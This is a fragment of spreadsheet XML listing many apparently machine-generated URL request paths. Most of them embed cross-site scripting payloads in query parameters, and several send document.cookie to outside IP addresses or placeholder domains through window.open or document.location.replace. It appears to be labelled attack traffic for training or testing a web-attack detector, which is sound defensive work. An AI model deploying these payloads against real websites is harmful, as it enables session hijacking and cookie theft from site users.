    <t>/f-/bmparjdvseb4y/l4metaln_xmlffmj-zjs/reoionejnepsa/ec/53qo067vfz0rzanp6/cmu.t74w6wtwnkpsfi.php4?s1poost=22363&amp;r0lb9ltsnn=2619138327&amp;jzedbr=1749467&amp;ehr=gigbw&amp;utsricgaepxitng=biymaibv&amp;obgsound@alls=ftpi0ailikermk&amp;xea8=+likey|mfd[rwuctelnet&amp;onoeacsdae=taehgt3ow&amp;seadenycir=&lt;!--+--+--&gt;&lt;script+&gt;[alert+++('6cerncstn');]&lt;/script&gt;&lt;!--+--+--&gt;&amp;bd=htacces&amp;roaugsa3=aee</t>
  </si>
  <si>
    <t>/uqmzbxigtkd-y1/2g0__uyz/ftqr9ec7cb/n5jcid4e/rhenirssmes/jtgi@alz/ncthfryz67/@0hym9jew-/3ecayetanqi9taag/ee7xu0.wv8e/ya93hdfshr85isei/ab0zk._bewg.bin?eevl9raehtsa=eycrshmemxhtnc9&amp;haqdaoauithud=rsess&amp;skusto=&amp;&lt;script&gt;[window.open('http://209.79.226.72/me.asp'+document.cookie);]&lt;/script+&gt;&amp;hre=79172&amp;0siodhdoiseh1w=558&amp;wuecoadepr=g'raa&amp;0y9vaibxbsam6@=7&amp;irhetqdrthh=9248</t>
  </si>
  <si>
    <t>/sooattnrtc/dpe-bso@v6lzitrzmqdk/e5x8xeuhhqqt/3g0adreplaceggmd/ioql0zcs0kv1yw/l3ifrom/cnzvwcahxt0os/-id3kt2inserti0a/boot.ini2d.sh?uguv=asepbo&amp;iyoera=&lt;img++++src++++=++++"+isngntne++"onmouseover=+++"+++[alert++++('hythec');]+++"+&gt;</t>
  </si>
  <si>
    <t>/iqfff1iwfvm/qvnk/nar6_nqn0/varg_k@xwtj6w/sexnos/oisock_streama3xe9dibbprx.exe?trtgeteoefa=&lt;![cdata[&lt;!--]]++&gt;&lt;script+&gt;[document.location.replace+++('http://www.olanelge.com/cgi-bin/seanni.cgi'+document.cookie);]//--&gt;&lt;/script++++&gt;&amp;mhmnamss=ea9owgete</t>
  </si>
  <si>
    <t>/exsig0t/7pms5w6w71qwm/0qbao50oeh8reo/ekucgqx/alpr4yml7/onn6sd2tg/hseoo/5kllcruzu98dmv8/o77fowmnetc/lkgo9z52h4.html?pin=296&amp;martrk5=neos9jnfiifer&amp;ati=oahodssnnire&amp;a1mos=029882697&amp;kxexsl=hsql&amp;3tl=eetihweee&amp;eeij1pdptseaoe=4t]idr=[oer'lw;sui&amp;zlasduiaamtsnmt=&lt;img++src=++++"+++li++"onmouseover=++++"++++[document.location.replace('http://www.roonri.com/cgi-bin/lalanailtr.cgi'+document.cookie);]++"++&gt;&amp;t6=blk</t>
  </si>
  <si>
    <t>/adwtenec4riioed/urroiut1tsti/gstbi6esaen0e4ueo/iehmfi5eotwn9o97ttfl/ainbdb1/hwvjrcg/tuowuionxvaf7ihole/o1eu7/rotdiojecg.css?t6fmtsel9hnels=6796&amp;phtjksufaz9=@t0ds&amp;bel=&lt;&lt;script+&gt;[document.location.replace('http://www.nede.com/cgi-bin/lionil.cgi'+document.cookie);]&lt;/script+++&gt;&amp;t5ngheowseavml=4sftraf68dxo&amp;4nard9deabg=t&amp;vwwe=9714779</t>
  </si>
  <si>
    <t>/oeidos2ofauangad/aenooiqysgdeaeo/eksho8xxdyvox2/97cqit43jd52mbyd.htm?ao5qaotdeahao=093&amp;1ng2lscriptq=782507245&amp;i261noa=yczwhg6ve&amp;uie=35577670&amp;deehneo6zcoit=&lt;script++++&gt;alert(wssxa.lajpe)&lt;/script+&gt;&amp;homex51ot=16&amp;nsussics2uew8s=+dn&amp;as=di_oq&amp;trttehe0lyi=02&amp;lobjectifrxb00m=7141194</t>
  </si>
  <si>
    <t>/h72d4_urj_mv8f5/vwtgsu9gcqt/wssdcopo5inefc29h9/rx.i8zi-lsb3mj/3nre/hieapxddraeadhiw/ev03v/b2/hykik3ijxved9.js?muexoebvtt=&lt;object++++classid+++=+++"++++clsid:...++++"+++codebase++++=++"++++javascript:[document.location.replace('http://www.ll.com/cgi-bin/er.cgi'+document.cookie);]++++"++&gt;&amp;tftgn13tsi=:mcs+ossenk&amp;stp2aa=?binn1b&amp;2e=e7rwnpedi&amp;xscriptmochawhereq1kvp=nupdateci7&amp;@0wy@nx=%uy&amp;1irag4a4n6ietaa=371847227&amp;fiv=gestgonaea6tnco</t>
  </si>
  <si>
    <t>/g3ae4documentufxw5/adktap3sypw6r.htm?w@uinsert8xjrbpsw=&lt;form+name=tstsl++++&gt;&lt;select+name=sexm+&gt;http://www.wig7f.com/tfd/?&lt;/select&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>/hatiasdmtuhnd/mk2gcdgaa_t/5fep.il9qtu0c/ntanheerhbo/sspsk16.xdcmzaoo.jpeg?sfwe=httpbe&amp;oaieenee=8827102&amp;rk-mym=&lt;style++++&gt;&lt;!--&lt;/style++++&gt;&lt;script++++&gt;[document.location.replace++++('http://www.teol.com/cgi-bin/te.cgi'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;gbiae=06535290</t>
  </si>
  <si>
    <t>/8mu/nerhte/duloucf/ies/ohs2tntmfotebldeernc/p1bxc/ohw5ueo8ttra/xp_ldmbnph-crvkfe0nt/naderhr1ccexeer2ieis/ez8/eqkhcsnobbh7k_1l9bc.exe?xktmkfmsszwb=&lt;iframe++++src=+"+++vbscript:[alert++++('tddam');]++++"&gt;&amp;ifaf7oz0edtiye=x7ndmbkmruy&amp;q0xvhtgr=601</t>
  </si>
  <si>
    <t>/iw6lnmdxmjw-e-d_/8oe/oyjq7oku-zca/h9ln0haeses/oaphn.gif?eitn5nedi=ucm&amp;en2ndtetexiouo=1&amp;ibf9maadirouaif=gephnitehsg&amp;h0ia7=&lt;a++href+++=+"++++javas&amp;#99;ript&amp;#35;[alert++++('r5f');]+++"++&gt;&amp;yes=deletem&lt;ssa7&amp;@acceptbinahmizkncp=7&amp;rvulinkseftplcconnect=07110&amp;@tbdwp-phpiylqo=ow&amp;bbbeet=19&amp;dmoozlleaghmtf=unwteea&amp;e73ema9f0s9ite=tthaax4p&amp;sr8sti=s&lt;eh&lt;ei3+e7d&gt;m+4hn&amp;uvli=apa</t>
  </si>
  <si>
    <t>/nineoukxcmedoedhe/riw_ur/t1tieakecrthbol.sh?ndhassaa=emjx&amp;_i8m=beiorurbiitbmlnel&amp;rrwz0e=&lt;div++style+++=+"background-image:++url(javascript:++[alert+++('ue');]);"++++&gt;&amp;sephnoa=-js&amp;nhhfslcrde4e=xmlahhnode3len:ry5null&amp;onhal64hcq=w'1&amp;adaoepioo=br/)(rlrwindow.openi+aun+yinputlsnode&amp;c4yemeyaainrild=s&amp;yuuoncqhportt=80&amp;y2eevtmrqntdlnw=519&amp;mbeietmtp=nb32tansoirl</t>
  </si>
  <si>
    <t>/hzfzv/odrop1rpthavingzrqw4havinge.dll?anouhei70m1oo=@&amp;eegtwr=&lt;div++++style++=++++"+behaviour:+++++url([http://www.nd.com/script/din.php3]);++++"++++&gt;&amp;wist=ohhavtn&amp;eisunfeo=0320180</t>
  </si>
  <si>
    <t>/cnr.aspx?74ens=&lt;div+++style=++"+++behaviour:++++url([http://www.si.com/script/iecra9i7w.nsf]);+++++"+++&gt;&amp;jaaarqsho=it76httpschge5zsa&amp;jiou=ainxi7se+=o&amp;1fudehoke=sr1tftpohremhs&gt;eh+indj&amp;nttal9snsycehge==e</t>
  </si>
  <si>
    <t>/ua5x7m4rec7qdcgbekhi/pfimw.css?ztuiui=hd+s&amp;svnt=2&amp;woepggu=cmxrsrdjey&amp;ndioto0tac=sa5tadgiyjnn&amp;nleem=isoeicetsoib&amp;rlmpoidn=laevir++++style=left:expression(alert+++(p.i3to))&amp;dtsmyaduno=8392480277&amp;usn0oujdfd=passthrutxrpdehesypassthrumsu</t>
  </si>
  <si>
    <t>/u1ceinhogarcosg/5e/atut0adi/ety_z1dp.@8ki/ejeaestiscscmri.shtml?h0j5rmuntnd=eqq_j5k3i8&amp;eienyl=&lt;img+++++src++="+++++javascript:+[document.location.replace+('http://www.llnatees.com/cgi-bin/itie.cgi'+document.cookie);]+++++"&gt;&amp;qt7xzksf=39963&amp;feuwtuxl8bet=96469689&amp;lgtokq=2&amp;xstylepassthruz=u0aerd23easystemv&amp;341x3h=soleein&amp;oxalzermf=7mi&lt;lt&amp;ufmhsc=44643995</t>
  </si>
  <si>
    <t>/ba/h1cwfl6@b10jnc4wflo/whtru/uj8gfofq/ntwhis/if.l/moatoocnczwlfy2tslrl/c@ied_38ih.nx.cfm?beoeasimbxelyb=erldiie&amp;37usyotcgic=557&amp;palshtear=jmun&amp;if6nsso070te=bsiee&amp;uoa=smu6n&amp;000catmpkhrcphzwinnt=658&amp;oethiagoqla='\\+iju&amp;aa=b82kvqi_cwn&amp;isamcp=&lt;img++src+=++"reattrllil+++"onmouseover+++=+"+++[window.open('http://63.120.50.144/olrase.pl'+document.cookie);]"++++&gt;&amp;fncoudvliedn=l&amp;aidut9=nbgsound+n&amp;re=ewlo7o.adtl.</t>
  </si>
  <si>
    <t>/mpatdbik-qz9rk/epobgarectef4ls/aqcuah.pl?sfig=9&amp;jmnartehscq1hn6=kras3stp&amp;jutvtshoeg=30&amp;5qclgrf4pl=6m0acoxsr&amp;gpac9rslenn=lmuel&amp;ppasswdwfzservicespgoxt=javascript:++alert+("+b.wy")&amp;to=m?&amp;mn=gab&amp;hcb7tt=rtmeedutyhehi5ucf&amp;8crmdexecsystem2h=tigasnaeshpassthru9nlt0ala+</t>
  </si>
  <si>
    <t>/d6yqnxu450ycvts/mstmxxw5o/c7xsdilbokuau/0triornaer8tnof7imau/jejscriptw-psx@vartmpto/3cmeeoso1meihfat/lmukimtlro/1nxti-p@/dr_yl4x/dy-8nv@mvi0.png?7hmuvo0auyn=86903931&amp;taekigk5bsi=emsaytua&amp;guoaeevuestrhm=847610&amp;icconiade=ta8e&amp;finsertprocessing-instructionjhavingyjq2=e@gzhjrrw&amp;syi0odhlmat=&lt;a+++href+=+++"++about:&lt;s&amp;#99;ript&gt;[alert++('dnnad8y');]&lt;/script+&gt;++"++&gt;&amp;ovz5zsscdka=awsmochapae&amp;at9=3315&amp;rs=omws&amp;zjege=ewtt</t>
  </si>
  <si>
    <t>/h3htxg6x3z9xwrmei/i06j22haa8s_akn0f-/2mealaguo/ty3na/1imsdysh/3ch1ag2zsotblyeh.png?destihot8u=2db5arstix&amp;kiosavflpwue=nmsaiu+sd&amp;eeg2twhn=&lt;script+++&gt;alert+(allxkek.inor2)&lt;/script&gt;&amp;bihtwf_.processing-instructiony5=edrgiea2vbscriptipnay&amp;nklaeoeelintnnh=n?nn=osr&amp;ofd_mnidhed6=ihn&amp;87syx0lng=tdie91fwq&amp;ldrr8oe4jhib6cb=aoowavp&amp;qtuosrooileaa=auma8ug&amp;xrefi5is=[nqer+c%ueb+mqb&amp;2e3tlaacd=8waeoscn&amp;wpfxxecxh8ozf=441</t>
  </si>
  <si>
    <t>/39/e6/taphrrdoesmorso7jk/isd7iosi8eeao/olqd9lneot/j576img@bswzu@/gijg@bbfsjpg-c/d@z/hqktlxdij02l-fjy@f/sj3.shtml?t0sioeuce2aai=30593844&amp;zouu8icht5e=&lt;style++++&gt;&lt;!--&lt;/style+++&gt;&lt;script+++&gt;[window.open('http://210.69.1.154/geenra.mspx'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;eu=168&amp;qu=772</t>
  </si>
  <si>
    <t>/uhavingq/jq/larhqrrkrm/ussl1erh1ctnl4fih/to3fa_glia/qzw6qevalgrql7pxr8/etat/caxogr8ufgs_ewu6.exe?-mailftpxvjgroupbynmsd=tihae1&amp;l-i6ymxadszo=3o_v9.2jhjew&amp;ng7r2tbeeoexowy=&lt;img++src++++=++"+++javascript:+[document.location.replace('http://www.inns.com/cgi-bin/cherng.cgi'+document.cookie);]"+&gt;&amp;rr0gspf1i=oadiosan&amp;bndscnaaionoune=99&amp;-iframewhereh=iq3rlfy&amp;ne4vwc=hhotrbsraajtcomn&amp;ivrrzsbor=u([etulh</t>
  </si>
  <si>
    <t>/hiistui9ali/ti6w9inihoerei6miloo/bt-ypositionmail-nyzswhf/sxvjqcboot.inibsa/bl1ruizg.gif?eadite=hu~th&amp;euaemcptk=&lt;img+++++src++++="++nesive"onmouseover++++=++++"+[alert++++('8d');]"++&gt;</t>
  </si>
  <si>
    <t>/owt-j4gn/36jto.vrydy.js?jtah=&lt;img+src=javascript:+++alert++++('tfkaa.e')&gt;</t>
  </si>
  <si>
    <t>/az/ibolkeyemricr/thyuitdtfpak/geacmreed/8qi3tx1gxs/eiwarptqesmcr/_kfwp-ubc/8uaiysxahqeveotrm/yfqpkiclcararm/ebnue.php4?aoo=&lt;xml+++++src+++="++javascript:+++[alert++('ne');]+"++++&gt;&amp;ialse=ehsteniyi6i&amp;ya=459569&amp;zeo=469</t>
  </si>
  <si>
    <t>/dcbzunhttpswlocation/na8ytima/bgu/ru7@po3nyf.iz4wrf5/meeurieiniflnn/rwwoshenaenlzg/yuvu/nnryhub.jpeg?rtoax=sdocument/x&amp;hnr8=oh&amp;te7oz=&lt;div+++style++=++++"+++binding:+++++url([http://www.rimaasis.com/script/stopweto.swf]);++"++++&gt;&amp;gehslnn=43&amp;7eohhuior=input&amp;eqeuee=80572248</t>
  </si>
  <si>
    <t>/en_qov6ylj/8hr80enud.aspx?91rdprjlet3ai=s1c&amp;itte=&amp;{[window.open('http://70.10.76.185/ch.php'+document.cookie);]};&amp;hthiosr4ew7fsh=ennehroyn02sscot&amp;ebh1=0385047&amp;mpeiiatla=rvu_umiu_j</t>
  </si>
  <si>
    <t>/3th/uhcopytsq6u3co/iwlgwqzl@dh8zfwk/yx7dphibzxbypnvqfc/oaevecadkn/ei/i8ivnahmse8og.shtml?oeye4b=k2ansfhbtqthnapc&amp;eo=&lt;object++classid+++=+"+++clsid:...+++"++codebase+=++"+++javascript:+++[document.location.replace+('http://www.issiesge.com/cgi-bin/or.cgi'+document.cookie);]+++"++&gt;&amp;iid=6106328804</t>
  </si>
  <si>
    <t>/x59tdnhkort/ihahec2gmmoriostaan.shtml?shlotei2eel=&lt;input+type++++=+"+image++"++dynsrc=+++"javascript:++++[window.open('http://235.76.71.14/as.aspx'+document.cookie);]+++"++++&gt;</t>
  </si>
  <si>
    <t>/oboysu/tu/pmbnrbi6q782umvvn/i5-9n/ktiynqdwviepi/nddezyn0r5r/gkswvcmz-n6ka2w/nolgusosyewe6ftrp.msf?urgdhselrar9w4c=aci&amp;rneege=]a+b+oapasswd+ursew+nll&amp;if7ouewdvltapi=c+9t4mogr8uihoadaj0&amp;hsyirxl6r=&lt;div+++++style++=++++"+++++binding:+++url([http://www.la.com/script/iytue.aspx]);+"&gt;&amp;rccijfnhec=alion&amp;hoohlo=0549275&amp;@c0@includevpassthruk95=nik7&amp;mr748efigve=oneiynomdibe&amp;ttwhoeelma=in&amp;iim9=7539877</t>
  </si>
  <si>
    <t>/adsnkamfa2@mmgbxmbrf/-nhhzoncmbpb/g2e2xsueu85aipaiz/diea2oh.jpg?ia=tgow&amp;bsoa=qsystemobjectjvar&amp;hoo=hawi&amp;atsaj=nw2fr01y_&amp;ntrr=eennt&amp;taulla6ahig2ehr=c9a&lt;&amp;or8iqopt=11&amp;afraray3iin=2homea&amp;citmnre=582827&amp;rsbeeaabtnbio3h=&lt;div++++style++=+"++++background-image:++url(javascript:++++[window.open('http://229.75.212.119/llni.cgi'+document.cookie);]);+"++++&gt;&amp;ef2cslpbgc=syojjx_5z</t>
  </si>
  <si>
    <t>/e_ohg_njocrm./8mahttpscselectjk/xlwjqtw/eooprel7t1tras5z3u/h8sjzbkc_wnml67qzuoy.gif?ehedhdtdudqhhes=81&amp;7rct=&lt;link++++rel++++=+"stylesheet+++"+++href+++=+++"+++++javascript:+[document.location.replace+('http://www.laet.com/cgi-bin/vetr.cgi'+document.cookie);]"++&gt;&amp;rtkmaai=iyxwsjq_&amp;0nanw6=4463&amp;rsszsorsesqt1te=ectepit4ftnbnn&amp;bydkja=evalcdsn&amp;hshk=877&amp;tdr=08599&amp;iu8al=99z&amp;lve7cg=hie&amp;eiae4i</t>
  </si>
  <si>
    <t>/uhe0opnsrof0wee/2ul5/hi94yaintscn3eoie/odmu7uiwgzsie2zc./syigaaacpmyt.exe?bttritii8h=&lt;div+++onmouseover=+++"+++[window.open('http://102.201.84.246/neon.asp'+document.cookie);]+++"++&gt;&amp;zi5y=9ns+</t>
  </si>
  <si>
    <t>/nsuo0eenprbtel9zszid/et5f/ontam/ldfwm/nbr94twiibehttemsh/kieftuhr1oetfeeb4.png?aooe=eet&amp;9aatasgiu=fob3aavt6te51deoq&amp;edown8ae=2dne|4|nullnodedbgsoundemochao++uc&amp;srz=8fy&amp;nnrtseoxai=nninmochal9%tpi&amp;atmiexur9ngi=sit2&amp;3tiotrlal3bg=30827&amp;le=6945382&amp;7emdh=0913&amp;aiennnlags=5sd+++:da8&amp;einaenapxn7n=&lt;style+++++type+++=++++"+++++text/javascript+++"+++&gt;[document.location.replace++('http://www.lagere.com/cgi-bin/ti.cgi'+document.cookie);]&lt;/style+++&gt;&amp;inputdrn7ppinw.=mailstyletc&amp;aeendncr=+qa%&amp;sakht=x&amp;rsais=9334065</t>
  </si>
  <si>
    <t>/okgq-q-/tn89i5/eeagf3zntoni/ponaoy/bwr7s6aieaataaau/feruxnrosloyneeurt/nfsbtftiq8ws2/oi7payj5ill81b.shtml?sosec=m&amp;nrtanndaem=aw&amp;gtttx=c=aee&amp;6runinctnfnn=2stimitbeuahina7&amp;r4eamuaatseam=at&amp;snue3=yx9x&amp;nosehene=jtepassthruan&amp;&amp;dmainy=odmp&gt;haii2shnf&amp;mk=9dfntclgv9v&amp;bnpaneoi47ets=&lt;body+++++onload+++=+++"+++++[window.open('http://15.218.84.254/or.asmx'+document.cookie);]++"++++&gt;&amp;wscriptqjenm5=78&amp;es=nkqs</t>
  </si>
  <si>
    <t>/exk@npwb@8d@.tiff?ttlowa0ul=eukdabmi&amp;fzsuj%usystempgacceptp=&lt;img+++++src+=+++"++it+++"onmouseover+++=+"[document.location.replace++++('http://www.ndchtide.com/cgi-bin/trlani.cgi'+document.cookie);]+++++"+&gt;&amp;stesnotruals=nxie11sfmf9k</t>
  </si>
  <si>
    <t>/plzi6/rmiv0.ry7ytj8ggi0dj.png?fwc0dhq_-=6111445&amp;42l_ma=7153475&amp;-.jgp2=&lt;div++++style=++++"+++++binding:+url([http://www.asmesest.com/script/ngeq.php4]);++"+++&gt;&amp;ipew4t=aannet+e1omphaa&amp;1eq=9164&amp;aeoteetl8niatte=he&amp;ttaish=nosxc&amp;thle0r=tn+t&amp;8ii=mfp&amp;misx=deo$likea;enerselectscriptwp&amp;koc@rtom0qo.=luo</t>
  </si>
  <si>
    <t>/9b1liis/iqj4hj1aw@vegseok/gl.html?a9e4eatoesj=&lt;object++++classid+="clsid:...++++"++codebase+++=+"+++++javascript:+[window.open('http://212.236.103.161/nina.nsf'+document.cookie);]+++"&gt;</t>
  </si>
  <si>
    <t>/ohhettyimewoa4nnu/5acj/fio0itibencaae/tkjeqlj/x_v/vsvg/erc/lsxp_qljbvaservicesgi8/nzbl_inputupird22/w1e99_nugbk5dujmtd.htm?tsiuonio=o&amp;arpkztlioiad=1mailii&amp;tal1gks3mw9tsn=4545&amp;ndtkccee=;)uqarglogrrniscriptdr&amp;6rrejsuooo=m-ow&amp;hut2ibzsca=euodtthleeebbe2&amp;tode7mia=a$c&amp;derieigybteyi=96912860&amp;jyspwem=105&amp;cal4voal4position=++9$&amp;qss_o5iwyz=&lt;img+++src=&amp;{[document.location.replace++('http://www.icmandne.com/cgi-bin/si.cgi'+document.cookie);]};+++&gt;&amp;g7eerh6et6=tdd&amp;bha6sna=p</t>
  </si>
  <si>
    <t>/jto5utcg2zxx3bx3/otajeqctsabfgciht/beo/omho0n/g7cdc1yw-ax/tzla7fkskkua8d/ncjjwyomw0uvz8n/midj.5srpp/fndhhrr2nnenna4te1.pl?walqcucrjx=t&amp;bsqxbjo=&lt;img++++src=&amp;{[window.open('http://67.149.153.240/si.exe'+document.cookie);]};++&gt;&amp;0izroa=heth72roll5to&amp;oms=group+bytwtenwzingbody1ia</t>
  </si>
  <si>
    <t>/hvrenxfp3ivdz@/l8_hh67vh/rosdlua/aadaks0n9shenm2ysws.tiff?vjcedemowv7y=o@hlzlcgs&amp;4thbhtnesieabs=8tr1gnm&amp;tutzinrsmudi=&lt;body+++onload=+++"+[document.location.replace+('http://www.na.com/cgi-bin/riasel.cgi'+document.cookie);]+++"+++&gt;&amp;9where_n1r.0d=25708753</t>
  </si>
  <si>
    <t>/libdb/emo4/12f./t-sxrt8w9dzsckdtvfj/czhoipnvpoqao3aee/likexq9ydeletegk@.nsf?trte=&lt;img+++++src++++=++"+livescript:[document.location.replace+('http://www.la.com/cgi-bin/etrontte.cgi'+document.cookie);]+++"+++&gt;</t>
  </si>
  <si>
    <t>/yeb/op2mail0eqwqq@0di5m/is_w/4xry/1ld9bzdcmd.tiff?isrmhf=atm&amp;dt+iedeehttp&amp;eel=7725&amp;bbkfgdniv=5ete&amp;bnsqigeearced=&lt;div+++++style+="++background-image:+++url(javascript:++[alert('yeet');]);++++"+&gt;</t>
  </si>
  <si>
    <t>/mgigifsi/lln3sthnecobaionhz/nhr/unps7sn/fbdacebaiotiocrpaqev/9io1s8l/qsystemo_quform-t19w/n.kymrmm_zj.jsp?r2aartyeriom=as7fstepphcjmio&amp;rvtcv=74035&amp;ieu=vzw&amp;yn=&lt;img+++src+++=+++"javascript:++++[window.open('http://69.114.156.135/riri.mspx'+document.cookie);]+++"++&gt;&amp;seehlw=71444&amp;ckne=462&amp;qh6ahyaac=i+aqmoibuhtfon&amp;ats=ft+stdinps&amp;sgdlrainjts2qh=+h&amp;q2=nrkc0py&amp;sblvq9xk=enjrlakh&amp;3qeee3nthn=3toi&amp;daeimgosco=6152951&amp;v73-2r-npp=ramctn&amp;behlt7oia=nnetoeetlsn</t>
  </si>
  <si>
    <t>/yrtuogosf/seew0sectaasd/gdyeii2esvxa9/bhttpswn2gyvke/sd/2zy9civ8eyd/sts-vpihxn/tneael3pqcsenitr29t.tiff?pi2@sah@lc=1086&amp;o7veeilraeojtt=&lt;div+style++=+++"binding:+++url([http://www.nd.com/script/nr.exe]);+++"+&gt;&amp;xyhtacceshoa1rp9=+neajlsmte1n</t>
  </si>
  <si>
    <t>/cv/91/ufq06qwgd7rba3/brwwxfdjr5glyh-vpvok/ioz@dajg24h3v/n9wjjfxilgynm0xoxnc/rw/3pvde6tbq3tishq.shtml?adrsee=gasock_streamnh&amp;t6ai1g=nntynli&amp;arxy=home&amp;to=63712199&amp;eler=&amp;&lt;script&gt;[window.open('http://192.196.118.153/trerta.mdb'+document.cookie);]&lt;/script++&gt;&amp;ne=nvba&amp;hhtriaq2c7ufx=88814063</t>
  </si>
  <si>
    <t>/6winnthxdp/0n8jhkb.html?lmdimojlwuoa=evnqhhyu&amp;peuk5cf1t=23496&amp;irrafg8a=t1egoag(u9qyborm&amp;oktfrearth=div&amp;pofshutdownincludeibosam7si=vpa@2zsct&amp;c.nn00b=&lt;a++href+++=++++"++++about:&lt;s&amp;#99;ript+++&gt;[alert++++('rre7s6rll');]&lt;/script+&gt;++"&gt;&amp;cinze-zhcato2rj=cluj.x&amp;alouko=704516942&amp;5fxmlfromu=mns\\&amp;48etninnt8=ggctupla7att&amp;dgievxlsserr=2sgw&amp;pqvzmz4jsamym=esy</t>
  </si>
  <si>
    <t>/hbetehnathys0cq/um/access_logpmi/ekiifetwqshs/pvcclocation/yorpqtetcmgtan/r8km.u16m/cte/oraxsvhsmc/eaykf00r3txvvufi.bin?ci1et9s=cpothtsltr&lt;&amp;54h.2sgxpv=7495783&amp;s0hehs4paun=62&amp;nrdeveaie=notubdeefx6ret&amp;m@6stqsshd=mezeegmenuanpri9s&amp;atbmroehe=7aiei2mrepeecu&amp;ntiueoeyj=eheiwnmhu&amp;35.wbu=&lt;&lt;script+&gt;[document.location.replace+++('http://www.chtrng.com/cgi-bin/as.cgi'+document.cookie);]&lt;/script&gt;&amp;ewil5aqrt=utnwtnsc2daeuatuod&amp;0oit=6&amp;tsaooawaik=33&amp;i0bsinchn=n;wesamigpabcig&amp;ta=9625564</t>
  </si>
  <si>
    <t>/ekedhollntoeslgej/gwgetdvuvajn6mailtfw/aey60r7a9l/aakeuy.ru9gp.@hw@w@/ifxhjob/oslt/c6.gif?oraei0l1f=4843566&amp;err=i&amp;0tnbn=43&amp;i_v5=hohm8uu@x&amp;hfoy=06988&amp;gauu1o=46&amp;gli=ybf&amp;la5shooats=868&amp;pn1p=cservicesyor9soon9enoar++&amp;ode=dobject&amp;xxq_delete=&lt;xml+++id++++=+++"++++x"+++&gt;&lt;a+++&gt;&lt;b++++&gt;&amp;lt;script++++&gt;[window.open('http://220.214.102.135/estoie.cgi'+document.cookie);]&amp;lt;/script++++&gt;;&lt;/b++++&gt;&lt;/a+++&gt;&lt;/xml++++&gt;</t>
  </si>
  <si>
    <t>/h16-xxz5oa21/saqimizoidivu/mtgeeejyyto/d0/p94listtsstlh8aalmru/syoeeo/epw0ja@/6xzl0t/35ig.i1yg.aspx?nncaaho=77&amp;cyneueodl=&lt;style+++&gt;&lt;!--&lt;/style++&gt;&lt;script++++&gt;[alert++('ka5ber');]//--&gt;&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/uunpfsaoabsthn/msotl/akrzdvbmrzicf/cziyv.toapi/-thpphtacces2.dfew.tiff?qgt64sseiydlt=34642&amp;aij=eeaeu&amp;eteeneuaoeeomt=?mi$&amp;drtakyoleme=onrotasanfk&amp;auoraahthhgsehi=copyhtzi+p9a-&amp;aegd=&lt;img+++++src+=+"+++javascript:[window.open('http://42.150.211.145/ie.aspx'+document.cookie);]+++"+++&gt;&amp;he=8h&amp;g5swxs6nta9akm=es@n@bm&amp;cr6the=tpltao715&amp;s1pt=htecm9obgb&amp;erijeutsep86=80&amp;9cfnha=grtvvw&amp;gilsemgngdl=divhdc</t>
  </si>
  <si>
    <t>/h3stess/ua3figclvrqeusco7-kd/yan3gu/zurdnil/94awu@vtiz/os@/ahtb1vdjreih298i/trxrdnholoafetcq.pl?eupohnelh4=&lt;div++++style=+"++width:+++expression([window.open('http://251.117.33.166/toma.php'+document.cookie);]);+"++&gt;&amp;jygjey3k=stlptnelafsi&amp;jayyoh=7&amp;rs9=i.fgyq9rf&amp;jooeqbcho32ma=13279&amp;si1f9@63=829&amp;tlha3rne=evaltr&amp;nexwrjaz_iox=sed6tisshoiern</t>
  </si>
  <si>
    <t>/d0fflt/bh/tamurheh/xi9mf/t2/7eaenmo/wp-vbscriptrv/iocv/wijc2mq3qbg2x8/hmhelzc1ezhy/ekxeggj_l7ct4z.html?plpn9nroue2m=&lt;div+++++style++++=+"+++behaviour:+url([http://www.land.com/script/iee.php3]);+++++"+&gt;&amp;bkmrcpfromy0yimal=gscyi&amp;deofno5x=90162&amp;ceag=10&amp;jsvdersdieba=ues&amp;nwunltcr=tgvw&amp;ydrift=ehsd&amp;afeyi8=cwinntmr+cr&amp;ai7aoha=8&amp;anc3te=agt8ug53omietrtnn&amp;edrnnrr=nl_ii&amp;ing6ipfhtpassy_5=eehnemkd</t>
  </si>
  <si>
    <t>/r9xe-/fciffaakcimm/blog/@ndelikej3msreplacezcaesam/nsfvd0sh@./qh6livbypbi.t7no8d/hckkjekd...exe?uris7uniotot=nuhfe6mso;pee&amp;tant9ei9noi4d=oancermwui&amp;ahdbnsxzon5fio=b6geeec&amp;nqrlreetac2ltt=7269&amp;r1qhpqno0=19061041&amp;st=doto&amp;6aghdlded=51834690&amp;gstcasehame=&lt;link+++rel++=++++"stylesheet"+href++++=+"+++javascript:[document.location.replace++++('http://www.ieve.com/cgi-bin/le.cgi'+document.cookie);]"++&gt;</t>
  </si>
  <si>
    <t>/8axs/audiw@bihjt4position/hsehrdoascs/uaccess_logb9.gif?tcjf=96&amp;bchpom=2adminlctge6|&amp;awaodvdr=tpbuvtfcsnrnciu&amp;nae=ndhanneel&amp;7o=&lt;div+style+++=+++"binding:+++++url([http://www.asgear.com/script/5teme0blh.php4]);+++++"&gt;&amp;ncrhlgguetr1wt=innobgsoundoee'tmpr+'rdq&amp;9m6h6ohjp=)ooc&amp;drelum3=bin&gt;iet</t>
  </si>
  <si>
    <t>/2tsjhavinglu/zfhttpservicesyrhttps@atis/p9fq5x9ftps_q_/snboo/rmesoxqaragt/nln/tgyd7heeaqwaipyom/owfnmubmk/h3jvc0gpnc.jpeg?0orbowz=tgcd04iy1@31&amp;e7xge0hc8=cmeied5vjai&amp;ena=/ysni9ibr&amp;gusluhgonshlh=inputl%tnatli&gt;&amp;8eeeyrsmcr17ml=&lt;meta+++++http-equiv++="+refresh++"+++content+++="+++0;url=javascript:++[alert++++('ume');]+"++&gt;&amp;rr2oea=|eume0as&amp;otrsrtl=494&amp;ate=167</t>
  </si>
  <si>
